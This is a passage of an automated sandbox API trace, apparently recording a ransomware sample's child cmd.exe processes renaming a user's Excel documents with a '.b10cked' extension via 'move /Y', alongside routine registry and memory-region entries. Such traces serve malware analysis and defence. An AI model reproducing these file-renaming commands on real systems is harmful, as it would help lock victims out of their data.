[0132.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.092] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0132.092] _wcsicmp (_String1="MUUM~1.XLS", _String2=".") returned 63 [0132.092] _wcsicmp (_String1="MUUM~1.XLS", _String2="..") returned 63 [0132.092] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\muum~1.xls")) returned 0x20 [0132.092] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.092] SetErrorMode (uMode=0x0) returned 0x0 [0132.092] SetErrorMode (uMode=0x1) returned 0x0 [0132.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", nBufferLength=0x104, lpBuffer=0x1af1ac, lpFilePart=0x1af194 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", lpFilePart=0x1af194*="MUUM~1.XLS") returned 0x24 [0132.092] SetErrorMode (uMode=0x0) returned 0x1 [0132.092] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0132.092] _wcsicmp (_String1="MUUM~1.XLS", _String2=".") returned 63 [0132.092] _wcsicmp (_String1="MUUM~1.XLS", _String2="..") returned 63 [0132.092] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\muum~1.xls")) returned 0x20 [0132.093] SetErrorMode (uMode=0x0) returned 0x0 [0132.093] SetErrorMode (uMode=0x1) returned 0x0 [0132.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", nBufferLength=0x104, lpBuffer=0x1af628, lpFilePart=0x1af3c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", lpFilePart=0x1af3c0*="MUUM~1.XLS") returned 0x24 [0132.093] SetErrorMode (uMode=0x0) returned 0x1 [0132.093] SetErrorMode (uMode=0x0) returned 0x0 [0132.093] SetErrorMode (uMode=0x1) returned 0x0 [0132.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x1af830, lpFilePart=0x1af3c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked", lpFilePart=0x1af3c0*="Muum.xlsx.b10cked") returned 0x2b [0132.093] SetErrorMode (uMode=0x0) returned 0x1 [0132.093] SetLastError (dwErrCode=0x0) [0132.093] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\muum.xlsx.b10cked")) returned 0xffffffff [0132.093] GetLastError () returned 0x2 [0132.093] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x1aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aed3c) returned 0x260eb8 [0132.093] FindNextFileW (in: hFindFile=0x260eb8, lpFindFileData=0x1aed3c | out: lpFindFileData=0x1aed3c) returned 0 [0132.094] GetLastError () returned 0x12 [0132.094] FindClose (in: hFindFile=0x260eb8 | out: hFindFile=0x260eb8) returned 1 [0132.094] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x271ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271ac8) returned 0x260eb8 [0132.094] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x1aefd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked", lpFilePart=0x0) returned 0x2b [0132.095] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx", nBufferLength=0x104, lpBuffer=0x1aefd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx", lpFilePart=0x0) returned 0x23 [0132.095] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\muum.xlsx")) returned 0x20 [0132.095] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\muum.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\muum.xlsx.b10cked"), dwFlags=0x3) returned 1 [0132.095] FindClose (in: hFindFile=0x260eb8 | out: hFindFile=0x260eb8) returned 1 [0132.095] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aef88 | out: _Buffer=" 1") returned 9 [0132.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.095] GetFileType (hFile=0x7) returned 0x2 [0132.095] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.095] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aef14 | out: lpMode=0x1aef14) returned 1 [0132.096] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aef48 | out: lpConsoleScreenBufferInfo=0x1aef48) returned 1 [0132.096] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0132.096] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aef88 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0132.096] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aef6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aef6c*=0x1a) returned 1 [0132.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.226] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.227] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.227] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.227] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.227] SetConsoleInputExeNameW () returned 0x1 [0132.227] GetConsoleOutputCP () returned 0x1b5 [0132.227] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.227] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.227] exit (_Code=0) Process: id = "106" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168a0" os_pid = "0xa50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11913 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11914 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 11915 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 11916 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 11917 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11918 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11919 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11920 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11921 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11922 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12099 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12100 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12101 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12102 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 12103 start_va = 0x480000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 12104 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12105 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12106 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12107 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12108 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12109 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12110 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12111 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12112 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12113 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 12114 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12115 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12116 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 12117 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 12118 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 12119 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12120 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 12121 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 12122 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 162 os_tid = 0x9a4 [0131.647] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f874 | out: lpSystemTimeAsFileTime=0x12f874*(dwLowDateTime=0x886729e0, dwHighDateTime=0x1d440a9)) [0131.647] GetCurrentProcessId () returned 0xa50 [0131.647] GetCurrentThreadId () returned 0x9a4 [0131.647] GetTickCount () returned 0x29f2b [0131.647] QueryPerformanceCounter (in: lpPerformanceCount=0x12f86c | out: lpPerformanceCount=0x12f86c*=18843585088) returned 1 [0131.647] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.647] __set_app_type (_Type=0x1) [0131.647] __p__fmode () returned 0x76b331f4 [0131.647] __p__commode () returned 0x76b331fc [0131.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.647] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.648] GetCurrentThreadId () returned 0x9a4 [0131.648] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a4) returned 0x38 [0131.648] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.648] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.648] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.648] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.648] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f804 | out: phkResult=0x12f804*=0x0) returned 0x2 [0131.648] VirtualQuery (in: lpAddress=0x12f83b, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.648] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.648] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.648] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.648] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f7d4, dwLength=0x1c | out: lpBuffer=0x12f7d4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.648] GetConsoleOutputCP () returned 0x1b5 [0131.648] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.649] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.649] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.649] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.649] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.649] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.649] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.649] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.649] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.649] GetEnvironmentStringsW () returned 0x270180* [0131.650] FreeEnvironmentStringsW (penv=0x270180) returned 1 [0131.650] GetEnvironmentStringsW () returned 0x270180* [0131.650] FreeEnvironmentStringsW (penv=0x270180) returned 1 [0131.650] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e774 | out: phkResult=0x12e774*=0x40) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0xa8, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x1, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x1, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x0, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x40, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x40, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x40, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegCloseKey (hKey=0x40) returned 0x0 [0131.650] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e774 | out: phkResult=0x12e774*=0x40) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x40, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x1, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x1, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x0, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x9, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x4, lpData=0x12e780*=0x9, lpcbData=0x12e778*=0x4) returned 0x0 [0131.650] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e77c, lpData=0x12e780, lpcbData=0x12e778*=0x1000 | out: lpType=0x12e77c*=0x0, lpData=0x12e780*=0x9, lpcbData=0x12e778*=0x1000) returned 0x2 [0131.651] RegCloseKey (hKey=0x40) returned 0x0 [0131.651] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.651] srand (_Seed=0x5b886366) [0131.651] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"" [0131.651] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\GJVVZA~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\gjVvzAf3d4AVCevrZIj.xlsx.b10cked\"" [0131.651] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.651] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2718e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.651] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.651] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.651] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.651] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.651] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.651] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.651] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.651] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.651] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.651] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.651] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.651] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.652] GetEnvironmentStringsW () returned 0x2722d0* [0131.652] FreeEnvironmentStringsW 